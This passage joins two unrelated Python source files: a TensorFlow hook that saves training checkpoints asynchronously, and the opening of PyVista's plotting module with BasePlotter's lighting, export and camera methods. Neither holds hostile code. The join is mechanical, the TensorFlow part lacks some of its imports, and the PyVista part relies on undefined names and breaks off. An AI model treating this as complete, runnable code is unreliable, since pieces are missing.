import time
from typing import Any, List, Optional, Text
from tensorflow.core.util import event_pb2
from tensorflow.python.client import session as session_lib
from tensorflow.python.framework import meta_graph
from tensorflow.python.framework import ops
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.training import basic_session_run_hooks
from tensorflow.python.training import monitored_session
from tensorflow.python.training import saver as saver_lib
from tensorflow.python.training import session_run_hook
from tensorflow.python.training import training_util
from tensorflow.python.training.summary_io import SummaryWriterCache
class AsyncCheckpointSaverHook(basic_session_run_hooks.CheckpointSaverHook):
"""Saves checkpoints every N steps or seconds."""
def __init__(self,
checkpoint_dir: Text,
save_secs: Optional[int] = None,
save_steps: Optional[int] = None,
saver: Optional[saver_lib.Saver] = None,
checkpoint_basename: Text = "model.ckpt",
scaffold: Optional[monitored_session.Scaffold] = None,
listeners: Optional[List[
basic_session_run_hooks.CheckpointSaverListener]] = None):
"""Initializes a `CheckpointSaverHook`.
Args:
checkpoint_dir: `str`, base directory for the checkpoint files.
save_secs: `int`, save every N secs.
save_steps: `int`, save every N steps.
saver: `Saver` object, used for saving.
checkpoint_basename: `str`, base name for the checkpoint files.
scaffold: `Scaffold`, use to get saver object.
listeners: List of `CheckpointSaverListener` subclass instances. Used for
callbacks that run immediately before or after this hook saves the
checkpoint.
Raises:
ValueError: One of `save_steps` or `save_secs` should be set.
ValueError: At most one of `saver` or `scaffold` should be set.
"""
save_path = os.path.join(checkpoint_dir, checkpoint_basename)
logging.info("Create AsyncCheckpointSaverHook saving to path\n%s",
save_path)
if listeners:
logging.info(" with %d listener(s).", len(listeners))
if saver is not None and scaffold is not None:
raise ValueError("You cannot provide both saver and scaffold.")
self._saver = saver
self._save_thread = None
self._write_graph_thread = None
self._checkpoint_dir = checkpoint_dir
self._save_path = save_path
self._scaffold = scaffold
self._timer = basic_session_run_hooks.SecondOrStepTimer(
every_secs=save_secs, every_steps=save_steps)
self._listeners = listeners or []
self._steps_per_run = 1
self._summary_writer = None
self._global_step_tensor = None
self._last_checkpoint_step = None
def _set_steps_per_run(self, steps_per_run):
self._steps_per_run = steps_per_run
def begin(self):
self._summary_writer = SummaryWriterCache.get(self._checkpoint_dir)
self._global_step_tensor = training_util._get_or_create_global_step_read() # pylint: disable=protected-access
if self._global_step_tensor is None:
raise RuntimeError(
"Global step should be created to use CheckpointSaverHook.")
for l in self._listeners:
l.begin()
def after_create_session(self, session: session_lib.Session, coord: Any):
global_step = session.run(self._global_step_tensor)
# We do write graph and saver_def at the first call of before_run.
# We cannot do this in begin, since we let other hooks to change graph and
# add variables in begin. Graph is finalized after all begin calls.
def _write_graph_fn(self):
training_util.write_graph(
ops.get_default_graph().as_graph_def(add_shapes=True),
self._checkpoint_dir, "graph.pbtxt")
self._write_graph_thread = threading.Thread(target=_write_graph_fn,
args=[self])
self._write_graph_thread.start()
saver_def = self._get_saver().saver_def if self._get_saver() else None
graph = ops.get_default_graph()
meta_graph_def = meta_graph.create_meta_graph_def(
graph_def=graph.as_graph_def(add_shapes=True), saver_def=saver_def)
self._summary_writer.add_graph(graph)
self._summary_writer.add_meta_graph(meta_graph_def)
# The checkpoint saved here is the state at step "global_step".
self._save(session, global_step)
self._timer.update_last_triggered_step(global_step)
def before_run(self, run_context: Any): # pylint: disable=unused-argument
return session_run_hook.SessionRunArgs(self._global_step_tensor)
def after_run(self, run_context: session_run_hook.SessionRunContext,
run_values: Any):
global_step = run_context.session.run(self._global_step_tensor)
if self._timer.should_trigger_for_step(global_step):
self._timer.update_last_triggered_step(global_step)
logging.info("Triggering checkpoint. %s", global_step)
if self._save(run_context.session, global_step):
run_context.request_stop()
def end(self, session: session_lib.Session):
if self._save_thread:
logging.info("Waiting for any pending checkpoints to finish.")
self._save_thread.join()
if self._write_graph_thread:
logging.info("Waiting for any pending write_graph to finish.")
self._write_graph_thread.join()
last_step = session.run(self._global_step_tensor)
if self._last_checkpoint_step != last_step:
self._save(session, last_step, asynchronous=False)
for l in self._listeners:
l.end(session, last_step)
def _save(self, session, step, asynchronous=True):
"""Saves the latest checkpoint, returns should_stop."""
def _save_fn():
"""Run the saver process."""
logging.info("Saving checkpoints for %d into %s.", step, self._save_path)
start_time = time.time()
for l in self._listeners:
l.before_save(session, step)
self._get_saver().save(session, self._save_path, global_step=step)
self._summary_writer.add_session_log(
event_pb2.SessionLog(
status=event_pb2.SessionLog.CHECKPOINT,
checkpoint_path=self._save_path), step)
for l in self._listeners:
l.after_save(session, step)
end_time = time.time()
logging.info("Checkpoint actual writing time: (%.3f sec)",
end_time - start_time)
logging.info("Checkpoint finished for %d into %s.", step, self._save_path)
if not asynchronous:
self._last_checkpoint_step = step
_save_fn()
return
if self._save_thread is not None:
self._save_thread.join(timeout=0.1)
if self._save_thread.is_alive():
logging.info("Saver thread still in progress, skipping checkpoint.")
return
self._last_checkpoint_step = step
self._save_thread = threading.Thread(target=_save_fn)
self._save_thread.start()
def _get_saver(self):
if self._saver is not None:
return self._saver
elif self._scaffold is not None:
return self._scaffold.saver
# Get saver from the SAVERS collection if present.
collection_key = ops.GraphKeys.SAVERS
savers = ops.get_collection(collection_key)
if not savers:
raise RuntimeError(
"No items in collection {}. Please add a saver to the collection "
"or provide a saver or scaffold.".format(collection_key))
elif len(savers) > 1:
raise RuntimeError(
"More than one item in collection {}. "
"Please indicate which one to use by passing it to the constructor."
.format(collection_key))
self._saver = savers[0]
return savers[0]
|
plotting.py
|
"""PyVista plotting module."""
import collections.abc
import ctypes
from functools import wraps
import io
import logging
import os
import pathlib
import platform
import textwrap
from threading import Thread
import time
from typing import Dict
import warnings
import weakref
import numpy as np
import scooby
import pyvista
from pyvista import _vtk
from pyvista.utilities import (
abstract_class,
assert_empty_kwargs,
convert_array,
get_array,
is_pyvista_dataset,
numpy_to_texture,
raise_not_matching,
wrap,
)
from ..utilities.misc import PyvistaDeprecationWarning
from ..utilities.regression import image_from_window
from ._plotting import _has_matplotlib, prepare_smooth_shading, process_opacity
from .colors import Color, get_cmap_safe
from .export_vtkjs import export_plotter_vtkjs
from .mapper import make_mapper
from .picking import PickingHelper
from .render_window_interactor import RenderWindowInteractor
from .renderer import Camera, Renderer
from .renderers import Renderers
from .scalar_bars import ScalarBars
from .tools import FONTS, normalize, opacity_transfer_function, parse_font_family # noqa
from .widgets import WidgetHelper
SUPPORTED_FORMATS = [".png", ".jpeg", ".jpg", ".bmp", ".tif", ".tiff"]
VERY_FIRST_RENDER = True # windows plotter helper
# EXPERIMENTAL: permit pyvista to kill the render window
KILL_DISPLAY = platform.system() == 'Linux' and os.environ.get('PYVISTA_KILL_DISPLAY')
if KILL_DISPLAY: # pragma: no cover
# this won't work under wayland
try:
X11 = ctypes.CDLL("libX11.so")
X11.XCloseDisplay.argtypes = [ctypes.c_void_p]
except OSError:
warnings.warn('PYVISTA_KILL_DISPLAY: Unable to load X11.\nProbably using wayland')
KILL_DISPLAY = False
def close_all():
"""Close all open/active plotters and clean up memory.
Returns
-------
bool
``True`` when all plotters have been closed.
"""
for _, p in _ALL_PLOTTERS.items():
if not p._closed:
p.close()
p.deep_clean()
_ALL_PLOTTERS.clear()
return True
log = logging.getLogger(__name__)
log.setLevel('CRITICAL')
log.addHandler(logging.StreamHandler())
def _warn_xserver(): # pragma: no cover
"""Check if plotting is supported and persist this state.
Check once and cache this value between calls. Warn the user if
plotting is not supported. Configured to check on Linux and Mac
OS since the Windows check is not quick.
"""
# disable windows check until we can get a fast way of verifying
# if windows has a windows manager (which it generally does)
if os.name == 'nt':
return
if not hasattr(_warn_xserver, 'has_support'):
_warn_xserver.has_support = pyvista.system_supports_plotting()
if not _warn_xserver.has_support:
# check if a display has been set
if 'DISPLAY' in os.environ:
return
# finally, check if using a backend that doesn't require an xserver
if pyvista.global_theme.jupyter_backend in ['ipygany', 'pythreejs']:
return
# Check if VTK has EGL support
ren_win_str = str(type(_vtk.vtkRenderWindow()))
if 'EGL' in ren_win_str or 'OSOpenGL' in ren_win_str:
return
warnings.warn(
'\n'
'This system does not appear to be running an xserver.\n'
'PyVista will likely segfault when rendering.\n\n'
'Try starting a virtual frame buffer with xvfb, or using\n '
' ``pyvista.start_xvfb()``\n'
)
USE_SCALAR_BAR_ARGS = """
"stitle" is a depreciated keyword and will be removed in a future
release.
Use ``scalar_bar_args`` instead. For example:
scalar_bar_args={'title': 'Scalar Bar Title'}
"""
@abstract_class
class BasePlotter(PickingHelper, WidgetHelper):
"""To be used by the Plotter and pyvistaqt.QtInteractor classes.
Parameters
----------
shape : list or tuple, optional
Number of sub-render windows inside of the main window.
Specify two across with ``shape=(2, 1)`` and a two by two grid
with ``shape=(2, 2)``. By default there is only one renderer.
Can also accept a string descriptor as shape. E.g.:
* ``shape="3|1"`` means 3 plots on the left and 1 on the right,
* ``shape="4/2"`` means 4 plots on top and 2 at the bottom.
border : bool, optional
Draw a border around each render window. Default ``False``.
border_color : color_like, optional
Either a string, rgb list, or hex color string. For example:
* ``color='white'``
* ``color='w'``
* ``color=[1.0, 1.0, 1.0]``
* ``color='#FFFFFF'``
border_width : float, optional
Width of the border in pixels when enabled.
title : str, optional
Window title of the scalar bar
lighting : str, optional
What lighting to set up for the plotter.
Accepted options:
* ``'light_kit'``: a vtk Light Kit composed of 5 lights.
* ``'three lights'``: illumination using 3 lights.
* ``'none'``: no light sources at instantiation.
The default is a Light Kit (to be precise, 5 separate lights
that act like a Light Kit).
theme : pyvista.themes.DefaultTheme, optional
Plot-specific theme.
"""
mouse_position = None
click_position = None
def __init__(
self,
shape=(1, 1),
border=None,
border_color='k',
border_width=2.0,
title=None,
splitting_position=None,
groups=None,
row_weights=None,
col_weights=None,
lighting='light kit',
theme=None,
):
"""Initialize base plotter."""
log.debug('BasePlotter init start')
self._theme = pyvista.themes.DefaultTheme()
if theme is None:
# copy global theme to ensure local plot theme is fixed
# after creation.
self._theme.load_theme(pyvista.global_theme)
else:
if not isinstance(theme, pyvista.themes.DefaultTheme):
raise TypeError(
'Expected ``pyvista.themes.DefaultTheme`` for '
f'``theme``, not {type(theme).__name__}.'
)
self._theme.load_theme(theme)
self.image_transparent_background = self._theme.transparent_background
# optional function to be called prior to closing
self.__before_close_callback = None
self._store_image = False
self.mesh = None
if title is None:
title = self._theme.title
self.title = str(title)
# add renderers
self.renderers = Renderers(
self,
shape,
splitting_position,
row_weights,
col_weights,
groups,
border,
border_color,
border_width,
)
# This keeps track of scalars names already plotted and their ranges
self._scalar_bars = ScalarBars(self)
# track if the camera has been set up
self._first_time = True
# Keep track of the scale
# track if render window has ever been rendered
self._rendered = False
# this helps managing closed plotters
self._closed = False
# lighting style; be forgiving with input (accept underscores
# and ignore case)
lighting_normalized = str(lighting).replace('_', ' ').lower()
if lighting_normalized == 'light kit':
self.enable_lightkit()
elif lighting_normalized == 'three lights':
self.enable_3_lights()
elif lighting_normalized != 'none':
raise ValueError(f'Invalid lighting option "{lighting}".')
# Add self to open plotters
self._id_name = f"{hex(id(self))}-{len(_ALL_PLOTTERS)}"
_ALL_PLOTTERS[self._id_name] = self
# Key bindings
self.reset_key_events()
log.debug('BasePlotter init stop')
self._image_depth_null = None
self.last_image_depth = None
self.last_image = None
self._has_background_layer = False
# set hidden line removal based on theme
if self.theme.hidden_line_removal:
self.enable_hidden_line_removal()
# set antialiasing based on theme
if self.theme.antialiasing:
self.enable_anti_aliasing()
@property
def theme(self):
"""Return or set the theme used for this plotter.
Examples
--------
Use the dark theme for a plotter.
>>> import pyvista
>>> from pyvista import themes
>>> pl = pyvista.Plotter()
>>> pl.theme = themes.DarkTheme()
>>> actor = pl.add_mesh(pyvista.Sphere())
>>> pl.show()
"""
return self._theme
@theme.setter
def theme(self, theme):
if not isinstance(theme, pyvista.themes.DefaultTheme):
raise TypeError(
'Expected a pyvista theme like '
'``pyvista.themes.DefaultTheme``, '
f'not {type(theme).__name__}.'
)
self._theme.load_theme(theme)
def import_gltf(self, filename, set_camera=True):
"""Import a glTF file into the plotter.
See https://www.khronos.org/gltf/ for more information.
Parameters
----------
filename : str
Path to the glTF file.
set_camera : bool, optional
Set the camera viewing angle to one compatible with the
default three.js perspective (``'xy'``).
Examples
--------
>>> import pyvista
>>> from pyvista import examples
>>> helmet_file = examples.gltf.download_damaged_helmet() # doctest:+SKIP
>>> texture = examples.hdr.download_dikhololo_night() # doctest:+SKIP
>>> pl = pyvista.Plotter() # doctest:+SKIP
>>> pl.import_gltf(helmet_file) # doctest:+SKIP
>>> pl.set_environment_texture(cubemap) # doctest:+SKIP
>>> pl.camera.zoom(1.8) # doctest:+SKIP
>>> pl.show() # doctest:+SKIP
See :ref:`load_gltf` for a full example using this method.
"""
if not _vtk.VTK9: # pragma: no cover
raise RuntimeError('Support for glTF requires VTK v9 or newer')
filename = os.path.abspath(os.path.expanduser(str(filename)))
if not os.path.isfile(filename):
raise FileNotFoundError(f'Unable to locate {filename}')
# lazy import here to avoid importing unused modules
from vtkmodules.vtkIOImport import vtkGLTFImporter
importer = vtkGLTFImporter()
importer.SetFileName(filename)
importer.SetRenderWindow(self.ren_win)
importer.Update()
# register last actor in actors
actor = self.renderer.GetActors().GetLastItem()
name = actor.GetAddressAsString("")
self.renderer._actors[name] = actor
# set camera position to a three.js viewing perspective
if set_camera:
self.camera_position = 'xy'
def export_html(self, filename):
"""Export this plotter as an interactive scene to a HTML file.
Parameters
----------
filename : str
Path to export the html file to.
Notes
-----
You will need ``ipywidgets`` and ``pythreejs`` installed for
this feature.
Examples
--------
>>> import pyvista
>>> from pyvista import examples
>>> mesh = examples.load_uniform()
>>> pl = pyvista.Plotter(shape=(1,2))
>>> _ = pl.add_mesh(mesh, scalars='Spatial Point Data', show_edges=True)
>>> pl.subplot(0,1)
>>> _ = pl.add_mesh(mesh, scalars='Spatial Cell Data', show_edges=True)
>>> pl.export_html('pyvista.html') # doctest:+SKIP
"""
pythreejs_renderer = self.to_pythreejs()
# import after converting as we check for pythreejs import first
try:
from ipywidgets.embed import embed_minimal_html
except ImportError: # pragma: no cover
raise ImportError('Please install ipywidgets with:\n' '\n\tpip install ipywidgets')
# convert and write to file
embed_minimal_html(filename, views=[pythreejs_renderer], title=self.title)
def to_pythreejs(self):
"""Convert this plotting scene to a pythreejs renderer.
Returns
-------
ipywidgets.Widget
Widget containing pythreejs renderer.
"""
self._on_first_render_request() # set up camera
from pyvista.jupyter.pv_pythreejs import convert_plotter
return convert_plotter(self)
def export_gltf(self, filename, inline_data=True, rotate_scene=True, save_normals=True):
"""Export the current rendering scene as a glTF file.
Visit https://gltf-viewer.donmccurdy.com/ for an online viewer.
See https://vtk.org/doc/nightly/html/classvtkGLTFExporter.html
for limitations regarding the exporter.
Parameters
----------
filename : str
Path to export the gltf file to.
inline_data : bool, optional
Sets if the binary data be included in the json file as a
base64 string. When ``True``, only one file is exported.
rotate_scene : bool, optional
Rotate scene to be compatible with the glTF specifications.
save_normals : bool, optional
Saves the point array ``'Normals'`` as ``'NORMALS'`` in
the outputted scene.
Examples
--------
Output a simple point cloud represented as balls.
>>> import numpy as np
>>> import pyvista
>>> point_cloud = np.random.random((100, 3))
>>> pdata = pyvista.PolyData(point_cloud)
>>> pdata['orig_sphere'] = np.arange(100)
>>> sphere = pyvista.Sphere(radius=0.02)
>>> pc = pdata.glyph(scale=False, geom=sphere)
>>> pl = pyvista.Plotter()
>>> _ = pl.add_mesh(pc, cmap='reds', smooth_shading=True,
... show_scalar_bar=False)
>>> pl.export_gltf('balls.gltf') # doctest:+SKIP
>>> pl.show()
Output the orientation plotter.
>>> from pyvista import demos
>>> pl = demos.orientation_plotter()
>>> pl.export_gltf('orientation_plotter.gltf') # doctest:+SKIP
>>> pl.show()
"""
if not _vtk.VTK9: # pragma: no cover
raise RuntimeError('Support for glTF requires VTK v9 or newer')
if not hasattr(self, "ren_win"):
raise RuntimeError('This plotter has been closed and is unable to export the scene.')
from vtkmodules.vtkIOExport import vtkGLTFExporter
# rotate scene to gltf compatible view
if rotate_scene:
for renderer in self.renderers:
for actor in renderer.actors.values():
if hasattr(actor, 'RotateX'):
actor.RotateX(-90)
actor.RotateZ(-90)
if save_normals:
try:
mapper = actor.GetMapper()
if mapper is None:
continue
dataset = mapper.GetInputAsDataSet()
if 'Normals' in dataset.point_data:
# ensure normals are active
normals = dataset.point_data['Normals']
dataset.point_data.active_normals = normals.copy()
except: # noqa: E722
pass
exporter = vtkGLTFExporter()
exporter.SetRenderWindow(self.ren_win)
exporter.SetFileName(filename)
exporter.SetInlineData(inline_data)
exporter.SetSaveNormal(save_normals)
exporter.Update()
# rotate back if applicable
if rotate_scene:
for renderer in self.renderers:
for actor in renderer.actors.values():
if hasattr(actor, 'RotateX'):
actor.RotateZ(90)
actor.RotateX(90)
def enable_hidden_line_removal(self, all_renderers=True):
"""Enable hidden line removal.
Wireframe geometry will be drawn using hidden line removal if
the rendering engine supports it.
Disable this with :func:`disable_hidden_line_removal
<BasePlotter.disable_hidden_line_removal>`
Parameters
----------
all_renderers : bool
If ``True``, applies to all renderers in subplots. If
``False``, then only applies to the active renderer.
Examples
--------
Create a side-by-side plotter and render a sphere in wireframe
with hidden line removal enabled on the left and disabled on
the right.
>>> import pyvista
>>> sphere = pyvista.Sphere(theta_resolution=20, phi_resolution=20)
>>> pl = pyvista.Plotter(shape=(1, 2))
>>> _ = pl.add_mesh(sphere, line_width=3, style='wireframe')
>>> _ = pl.add_text("With hidden line removal")
>>> pl.enable_hidden_line_removal(all_renderers=False)
>>> pl.subplot(0, 1)
>>> pl.disable_hidden_line_removal(all_renderers=False)
>>> _ = pl.add_mesh(sphere, line_width=3, style='wireframe')
>>> _ = pl.add_text("Without hidden line removal")
>>> pl.show()
"""
if all_renderers:
for renderer in self.renderers:
renderer.enable_hidden_line_removal()
else:
self.renderer.enable_hidden_line_removal()
def disable_hidden_line_removal(self, all_renderers=True):
"""Disable hidden line removal.
Enable again with :func:`enable_hidden_line_removal
<BasePlotter.enable_hidden_line_removal>`
Parameters
----------
all_renderers : bool
If ``True``, applies to all renderers in subplots. If
``False``, then only applies to the active renderer.
Examples
--------
Enable and then disable hidden line removal.
>>> import pyvista
>>> pl = pyvista.Plotter()
>>> pl.enable_hidden_line_removal()
>>> pl.disable_hidden_line_removal()
"""
if all_renderers:
for renderer in self.renderers:
renderer.disable_hidden_line_removal()
else:
self.renderer.disable_hidden_line_removal()
@property
def scalar_bar(self):
"""First scalar bar. Kept for backwards compatibility."""
return list(self.scalar_bars.values())[0]
@property
def scalar_bars(self):
"""Scalar bars.
Examples
--------
>>> import pyvista
>>> sphere = pyvista.Sphere()
>>> sphere['Data'] = sphere.points[:, 2]
>>> plotter = pyvista.Plotter()
>>> _ = plotter.add_mesh(sphere)
>>> plotter.scalar_bars
Scalar Bar Title Interactive
"Data" False
Select a scalar bar actor based on the title of the bar.
>>> plotter.scalar_bars['Data'] # doctest:+SKIP
(vtkmodules.vtkRenderingAnnotation.vtkScalarBarActor)0x7fcd3567ca00
"""
return self._scalar_bars
@property
def _before_close_callback(self):
"""Return the cached function (expecting a reference)."""
if self.__before_close_callback is not None:
return self.__before_close_callback()
@_before_close_callback.setter
def _before_close_callback(self, func):
"""Store a weakref.ref of the function being called."""
if func is not None:
self.__before_close_callback = weakref.ref(func)
else:
self.__before_close_callback = None
@property
def shape(self):
"""Shape of the plotter.
Examples
--------
Return the plotter shape.
>>> import pyvista
>>> plotter = pyvista.Plotter(shape=(2, 2))
>>> plotter.shape
(2, 2)
"""
return self.renderers._shape
@property
def renderer(self):
"""Return the active renderer.
Examples
--------
>>> import pyvista
>>> pl = pyvista.Plotter()
>>> pl.renderer # doctest:+SKIP
(Renderer)0x7f916129bfa0
"""
return self.renderers.active_renderer
@property
def store_image(self):
"""Store last rendered frame on close.
This is normally disabled to avoid caching the image, and is
enabled by default by setting:
``pyvista.BUILDING_GALLERY = True``
Examples
--------
>>> import pyvista
>>> pl = pyvista.Plotter(off_screen=True)
>>> pl.store_image = True
>>> _ = pl.add_mesh(pyvista.Cube())
>>> pl.show()
>>> image = pl.last_image
>>> type(image) # doctest:+SKIP
<class 'numpy.ndarray'>
"""
return self._store_image
@store_image.setter
def store_image(self, value):
"""Store last rendered frame on close."""
self._store_image = bool(value)
def subplot(self, index_row, index_column=None):
"""Set the active subplot.
Parameters
----------
index_row : int
Index of the subplot to activate along the rows.
index_column : int
Index of the subplot to activate along the columns.
Examples
--------
Create a 2 wide plot and set the background of right-hand plot
to orange. Add a cube to the left plot and a sphere to the
right.
>>> import pyvista
>>> pl = pyvista.Plotter(shape=(1, 2))
>>> actor = pl.add_mesh(pyvista.Cube())
>>> pl.subplot(0, 1)
>>> actor = pl.add_mesh(pyvista.Sphere())
>>> pl.set_background('orange', all_renderers=False)
>>> pl.show()
"""
self.renderers.set_active_renderer(index_row, index_column)
@wraps(Renderer.add_legend)
def add_legend(self, *args, **kwargs):
"""Wrap ``Renderer.add_legend``."""
return self.renderer.add_legend(*args, **kwargs)
@wraps(Renderer.remove_legend)
def remove_legend(self, *args, **kwargs):
"""Wrap ``Renderer.remove_legend``."""
return self.renderer.remove_legend(*args, **kwargs)
@property
def legend(self):
"""Legend actor.
There can only be one legend actor per renderer. If
``legend`` is ``None``, there is no legend actor.
"""
return self.renderer.legend
@wraps(Renderer.add_floor)
def add_floor(self, *args, **kwargs):
"""Wrap ``Renderer.add_floor``."""
return self.renderer.add_floor(*args, **kwargs)
@wraps(Renderer.remove_floors)
def remove_floors(self, *args, **kwargs):
"""Wrap ``Renderer.remove_floors``."""
return self.renderer.remove_floors(*args, **kwargs)
def enable_3_lights(self, only_active=False):
"""Enable 3-lights illumination.
This will replace all pre-existing lights in the scene.
Parameters
----------
only_active : bool
If ``True``, only change the active renderer. The default
is that every renderer is affected.
Examples
--------
>>> from pyvista import demos
>>> pl = demos.orientation_plotter()
>>> pl.enable_3_lights()
>>> pl.show()
Note how this varies from the default plotting.
>>> pl = demos.orientation_plotter()
>>> pl.show()
"""
def _to_pos(elevation, azimuth):
theta = azimuth * np.pi / 180.0
phi = (90.0 - elevation) * np.pi / 180.0
x = np.sin(theta) * np.sin(phi)
y = np.cos(phi)
z = np.cos(theta) * np.sin(phi)
return x, y, z
renderers = [self.renderer] if only_active else self.renderers
for renderer in renderers:
renderer.remove_all_lights()
# Inspired from Mayavi's version of Raymond Maple 3-lights illumination
intensities = [1, 0.6, 0.5]
all_angles = [(45.0, 45.0), (-30.0, -60.0), (-30.0, 60.0)]
for intensity, angles in zip(intensities, all_angles):
light = pyvista.Light(light_type='camera light')
light.intensity = intensity
light.position = _to_pos(*angles)
for renderer in renderers:
renderer.add_light(light)
def disable_3_lights(self):
"""Please use ``enable_lightkit``, this method has been depreciated."""
from pyvista.core.errors import DeprecationError
raise DeprecationError('DEPRECATED: Please use ``enable_lightkit``')
def enable_lightkit(self, only_active=False):
"""Enable the default light-kit lighting.
See:
https://www.researchgate.net/publication/2926068
This will replace all pre-existing lights in the renderer.
Parameters
----------
only_active : bool
If ``True``, only change the active renderer. The default is that
every renderer is affected.
Examples
--------
Create a plotter without any lights and then enable the
default light kit.
>>> import pyvista
>>> pl = pyvista.Plotter(lighting=None)
>>> pl.enable_lightkit()
>>> actor = pl.add_mesh(pyvista.Cube(), show_edges=True)
>>> pl.show()
"""
renderers = [self.renderer] if only_active else self.renderers
light_kit = _vtk.vtkLightKit()
for renderer in renderers:
renderer.remove_all_lights()
# Use the renderer as a vtkLightKit parser.
# Feed it the LightKit, pop off the vtkLights, put back
# pyvista Lights. This is the price we must pay for using
# inheritance rather than composition.
light_kit.AddLightsToRenderer(renderer)
vtk_lights = renderer.lights
renderer.remove_all_lights()
for vtk_light in vtk_lights:
light = pyvista.Light.from_vtk(vtk_light)
renderer.add_light(light)
renderer.LightFollowCameraOn()
@wraps(Renderer.enable_anti_aliasing)
def enable_anti_aliasing(self, *args, **kwargs):
"""Wrap ``Renderer.enable_anti_aliasing``."""
for renderer in self.renderers:
renderer.enable_anti_aliasing(*args, **kwargs)
@wraps(Renderer.disable_anti_aliasing)
def disable_anti_aliasing(self, *args, **kwargs):
"""Wrap ``Renderer.disable_anti_aliasing``."""
self.renderer.disable_anti_aliasing(*args, **kwargs)
@wraps(Renderer.set_focus)
def set_focus(self, *args, render=True, **kwargs):
"""Wrap ``Renderer.set_focus``."""
log.debug('set_focus: %s, %s', str(args), str(kwargs))
self.renderer.set_focus(*args, **kwargs)
if render:
self.render()
@wraps(Renderer.set_position)
def set_position(self, *args, render=True, **kwargs):
"""Wrap ``Renderer.set_position``."""
self.renderer.set_position(*args, **kwargs)
if render:
self.render()
@wraps(Renderer.set_viewup)
def set_viewup(self, *args, render=True, **kwargs):
"""Wrap ``Renderer.set_viewup``."""
self.renderer.set_viewup(*args, **kwargs)
if render:
self.render()
@wraps(Renderer.add_orientation_widget)
def add_orientation_widget(self, *args, **kwargs):
"""Wrap ``Renderer.add_orientation_widget``."""
return self.renderer.add_orientation_widget(*args, **kwargs)
@wraps(Renderer.add_axes)
def add_axes(self, *args, **kwargs):
"""Wrap ``Renderer.add_axes``."""
return self.renderer.add_axes(*args, **kwargs)
@wraps(Renderer.hide_axes)
def hide_axes(self, *args, **kwargs):
"""Wrap ``Renderer.hide_axes``."""
return self.renderer.hide_axes(*args, **kwargs)
@wraps(Renderer.show_axes)
def show_axes(self, *args, **kwargs):
"""Wrap ``Renderer.show_axes``."""
return self.renderer.show_axes(*args, **kwargs)
@wraps(Renderer.update_bounds_axes)
def update_bounds_axes(self, *args, **kwargs):
"""Wrap ``Renderer.update_bounds_axes``."""
return self.renderer.update_bounds_axes(*args, **kwargs)
@wraps(Renderer.add_chart)
def add_chart(self, *args, **kwargs):
"""Wrap ``Renderer.add_chart``."""
return self.renderer.add_chart(*args, **kwargs)
@wraps(Renderer.remove_chart)
def remove_chart(self, *args, **kwargs):
"""Wrap ``Renderer.remove_chart``."""
return self.renderer.remove_chart(*args, **kwargs)
@wraps(Renderer.add_actor)
def add_actor(self, *args, **kwargs):
"""Wrap ``Renderer.add_actor``."""
return self.renderer.add_actor(*args, **kwargs)
@wraps(Renderer.enable_parallel_projection)
def enable_parallel_projection(self, *args, **kwargs):
"""Wrap ``Renderer.enable_parallel_projection``."""
return self.renderer.enable_parallel_projection(*args, **kwargs)
@wraps(Renderer.disable_parallel_projection)
def disable_parallel_projection(self, *args, **kwargs):
"""Wrap ``Renderer.disable_parallel_projection``."""
return self.renderer.disable_parallel_projection(*args, **kwargs)
@wraps(Renderer.enable_shadows)
def enable_shadows(self, *args, **kwargs):
"""Wrap ``Renderer.enable_shadows``."""
return self.renderer.enable_shadows(*args, **kwargs)
@wraps(Renderer.disable_shadows)
def disable_shadows(self, *args, **kwargs):
"""Wrap ``Renderer.disable_shadows``."""
return self.renderer.disable_shadows(*args, **kwargs)
@property
def parallel_projection(self):
"""Return parallel projection state of active render window."""
return self.renderer.parallel_projection
@parallel_projection.setter
def parallel_projection(self, state):
"""Set parallel projection state of all active render windows."""
self.renderer.parallel_projection = state
@property
def parallel_scale(self):
"""Return parallel scale of active render window."""
return self.renderer.parallel_scale
@parallel_scale.setter
def parallel_scale(self, value):
"""Set parallel scale of all active render windows."""
self.renderer.parallel_scale = value
@wraps(Renderer.add_axes_at_origin)
def add_axes_at_origin(self, *args, **kwargs):
"""Wrap ``Renderer.add_axes_at_origin``."""
return self.renderer.add_axes_at_origin(*args, **kwargs)
@wraps(Renderer.show_bounds)
def show_bounds(self, *args, **kwargs):
"""Wrap ``Renderer.show_bounds``."""
return self.renderer.show_bounds(*args, **kwargs)
@wraps(Renderer.add_bounding_box)
def add_bounding_box(self, *args, **kwargs):
"""Wrap ``Renderer.add_bounding_box``."""
return self.renderer.add_bounding_box(*args, **kwargs)
@wraps(Renderer.remove_bounding_box)
def remove_bounding_box(self, *args, **kwargs):
"""Wrap ``Renderer.remove_bounding_box``."""
return self.renderer.remove_bounding_box(*args, **kwargs)
@wraps(Renderer.remove_bounds_axes)
def remove_bounds_axes(self, *args, **kwargs):
"""Wrap ``Renderer.remove_bounds_axes``."""
return self.renderer.remove_bounds_axes(*args, **kwargs)
@wraps(Renderer.show_grid)
def show_grid(self, *args, **kwargs):
"""Wrap ``Renderer.show_grid``."""
return self.renderer.show_grid(*args, **kwargs)
@wraps(Renderer.set_scale)
def set_scale(self, *args, **kwargs):
"""Wrap ``Renderer.set_scale``."""
return self.renderer.set_scale(*args, **kwargs)
@wraps(Renderer.enable_eye_dome_lighting)
def enable_eye_dome_lighting(self, *args, **kwargs):
"""Wrap ``Renderer.enable_eye_dome_lighting``."""
return self.renderer.enable_eye_dome_lighting(*args, **kwargs)
@wraps(Renderer.disable_eye_dome_lighting)
def disable_eye_dome_lighting(self, *args, **kwargs):
"""Wrap ``Renderer.disable_eye_dome_lighting``."""
self.renderer.disable_eye_dome_lighting(*args, **kwargs)
@wraps(Renderer.reset_camera)
def reset_camera(self, *args, **kwargs):
"""Wrap ``Renderer.reset_camera``."""
self.renderer.reset_camera(*args, **kwargs)
self.render()
@wraps(Renderer.isometric_view)
def isometric_view(self, *args, **kwargs):
"""Wrap ``Renderer.isometric_view``."""
self.renderer.isometric_view(*args, **kwargs)
@wraps(Renderer.view_isometric)
def view_isometric(self, *args, **kwarg):
"""Wrap ``Renderer.view_isometric``."""
self.renderer.view_isometric(*args, **kwarg)
@wraps(Renderer.view_vector)
def view_vector(self, *args, **kwarg):
"""Wrap ``Renderer.view_vector``."""
self.renderer.view_vector(*args, **kwarg)
@wraps(Renderer.view_xy)
def view_xy(self, *args, **kwarg):
"""Wrap ``Renderer.view_xy``."""
self.renderer.view_xy(*args, **kwarg)
@wraps(Renderer.view_yx)
def view_yx(self, *args, **kwarg):
"""Wrap ``Renderer.view_yx``."""
self.renderer.view_yx(*args, **kwarg)
